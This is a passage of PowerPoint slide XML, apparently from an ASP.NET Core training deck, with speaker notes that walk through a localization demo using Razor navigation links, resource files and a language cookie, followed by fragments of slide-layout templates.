              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                    &lt;li&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-area</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="Home" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="Index"&gt;@Localizer["Home"]&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                    &lt;li&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-area</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="Home" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="About"&gt;@Localizer["About"]&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                    &lt;li&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-area</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="Home" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="Contact"&gt;@Localizer["Contact"]&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                    &lt;li&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-area</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="Home" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>asp-action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SetRussianLanguage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&gt;Set Russian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lanauge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in cookies&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Resources folder and show the structure of xml resource files. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explain that each View mapped to the file and the name is a combination of a full path to a view.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run an app-&gt; press Set Russian Language to show how localization mechanism working</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At the end, uncomment the line to delete the cookie from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>your machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="308762059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73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Notes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6896555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pPr/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280355358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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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34264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microsoft.com/en-us/legal/intellectualproperty/permissions/default.aspx"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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>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36" tIns="91436">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="36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dirty="0"/>
              <a:t>Course Title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="995257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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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70" tIns="137154">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="57148" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="3600" baseline="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dirty="0"/>
              <a:t>Lab: Title of Lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2627310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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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36" tIns="91436">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500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1500" baseline="0">
                <a:latin typeface="Segoe Pro Light"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
